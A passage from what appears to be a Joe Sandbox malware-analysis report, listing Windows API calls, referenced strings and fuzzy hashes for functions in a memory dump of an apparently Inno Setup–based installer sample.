                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                      • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                      • API String ID: 2238633743-2683653824
                                                                                                      • Opcode ID: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                                      • Instruction ID: ed4894befccbfeda2ad80f7d1b9e1cb4df1a551eae9986247d0c145e26b1cd95
                                                                                                      • Opcode Fuzzy Hash: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                                      • Instruction Fuzzy Hash: DDB092D0A82740A4C90077F2985B90F2A4488A271EB10153B710476483EABC84100EAE
                                                                                                      APIs
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
                                                                                                      • FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFileNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 2066263336-0
                                                                                                      • Opcode ID: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                                      • Instruction ID: 2ce97de6e4eb512f8d4c2eb376340b964b0e691095a652a34be041e4083b4e02
                                                                                                      • Opcode Fuzzy Hash: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                                      • Instruction Fuzzy Hash: 07813A74D0024D9FCF11EFA5CC91ADFBBB8EF49304F5080AAE908A7291D6399A46CF54
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
                                                                                                        • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
                                                                                                      • GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountErrorFileLastMoveTick
                                                                                                      • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                                      • API String ID: 2406187244-2685451598
                                                                                                      • Opcode ID: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                                      • Instruction ID: cfe7f312216358cbd0971b398f0cafde252de4893b1317a5ce8d70824cf78b76
                                                                                                      • Opcode Fuzzy Hash: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                                      • Instruction Fuzzy Hash: 4D418570A006099BDB10EFA5D882AEF77B5FF48314F508537E408BB395D7789A058BA9
                                                                                                      APIs
                                                                                                      • GetDesktopWindow.USER32 ref: 00413D46
                                                                                                      • GetDesktopWindow.USER32 ref: 00413DFE
                                                                                                        • Part of subcall function 00418EC0: 6FBCC6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
                                                                                                        • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
                                                                                                      • SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CursorDesktopWindow$Show
                                                                                                      • String ID:
                                                                                                      • API String ID: 2074268717-0
                                                                                                      • Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                                      • Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
                                                                                                      • Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                                      • Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
APIs
• GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
• LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
• LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: LoadString$FileMessageModuleName
• String ID:
• API String ID: 704749118-0
• Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
• Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
• Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
• Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
APIs
• SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
  • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
• InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
  • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
• IsRectEmpty.USER32(?), ref: 0044E953
• ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
• String ID:
• API String ID: 855768636-0
• Opcode ID: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
• Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
• Opcode Fuzzy Hash: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
• Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
APIs
• OffsetRect.USER32(?,?,00000000), ref: 00495988
• OffsetRect.USER32(?,00000000,?), ref: 004959A3
• OffsetRect.USER32(?,?,00000000), ref: 004959BD
• OffsetRect.USER32(?,00000000,?), ref: 004959D8
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: OffsetRect
• String ID:
• API String ID: 177026234-0
• Opcode ID: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
• Instruction ID: 9409249b62c1188f54b5b62e2685c04785358b71117f53a2337039625fc08c68
• Opcode Fuzzy Hash: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
• Instruction Fuzzy Hash: 1121AEB6700701AFDB00DE69CD81E5BB7DAEFC4350F248A2AF944C3249D638ED048761
APIs
• GetCursorPos.USER32 ref: 00417260
• SetCursor.USER32(00000000), ref: 004172A3
• GetLastActivePopup.USER32(?), ref: 004172CD
• GetForegroundWindow.USER32(?), ref: 004172D4
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: Cursor$ActiveForegroundLastPopupWindow
• String ID:
• API String ID: 1959210111-0
• Opcode ID: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
• Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
• Opcode Fuzzy Hash: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
• Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
APIs
• MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
• MulDiv.KERNEL32(?,00000008,?), ref: 00495605
• MulDiv.KERNEL32(?,00000008,?), ref: 00495619
• MulDiv.KERNEL32(?,00000008,?), ref: 00495637
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
• Instruction ID: b77f8f3c6746ea581d036ce488ab013aedd37a602364075716cddbfd1b85439e
• Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
• Instruction Fuzzy Hash: A5112E72604504ABCB40DEA9D8C4D9B7BECEF8D324B6441AAF908DB242D674ED408B68
APIs
• GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
• UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
• RegisterClassA.USER32(00499598), ref: 0041F4D4
• SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: Class$InfoLongRegisterUnregisterWindow
• String ID:
• API String ID: 4025006896-0
• Opcode ID: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
• Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
• Opcode Fuzzy Hash: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
• Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
APIs
• WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
• GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
• CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
• String ID:
• API String ID: 4071923889-0
• Opcode ID: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
• Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
• Opcode Fuzzy Hash: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
• Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
APIs
• FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
• LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
• SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
• LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
• Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
• Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
• Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 004705F1
                                                                                                      Strings
                                                                                                      • Unsetting NTFS compression on file: %s, xrefs: 004705D7
                                                                                                      • Setting NTFS compression on file: %s, xrefs: 004705BF
                                                                                                      • Failed to set NTFS compression state (%d)., xrefs: 00470602
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                                      • API String ID: 1452528299-3038984924
                                                                                                      • Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                                      • Instruction ID: 452327faed6fd823952186a677ff1a78a18aba12ee86070aec797b5412e08bdc
                                                                                                      • Opcode Fuzzy Hash: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                                      • Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
                                                                                                      Strings
                                                                                                      • Setting NTFS compression on directory: %s, xrefs: 0046FE13
                                                                                                      • Failed to set NTFS compression state (%d)., xrefs: 0046FE56
                                                                                                      • Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                                      • API String ID: 1452528299-1392080489
                                                                                                      • Opcode ID: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                                      • Instruction ID: 6c3eba688a3488f6cff2036d9eec8e6f632fba0cce39d579df3f4bd3b957a0ce
                                                                                                      • Opcode Fuzzy Hash: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                                      • Instruction Fuzzy Hash: E5014421E0824856CB04D7ADE44129DBBA49F49304F4485BBA495E7253EB790A09879B
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
                                                                                                      • RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
                                                                                                      • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 4283692357-0
                                                                                                      • Opcode ID: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                                      • Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
                                                                                                      • Opcode Fuzzy Hash: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                                      • Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$CountSleepTick
                                                                                                      • String ID:
                                                                                                      • API String ID: 2227064392-0
                                                                                                      • Opcode ID: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                                      • Instruction ID: 56d8cd0ebf6ab4a4d31aad6ab38b951dee0ff9c0bbbb70c30f4e079d31b44593
                                                                                                      • Opcode Fuzzy Hash: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                                      • Instruction Fuzzy Hash: C6E0ED6A30921149863131AE98CA6AF4D48CBC2324B28853FE08CE6283C89C4C0A867E
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
                                                                                                      • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
                                                                                                      • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 215268677-0
                                                                                                      • Opcode ID: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                                      • Instruction ID: 91f0679cb69370e855683a510bc75a037ced8834772831ea40795c83ba0b1c60
                                                                                                      • Opcode Fuzzy Hash: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
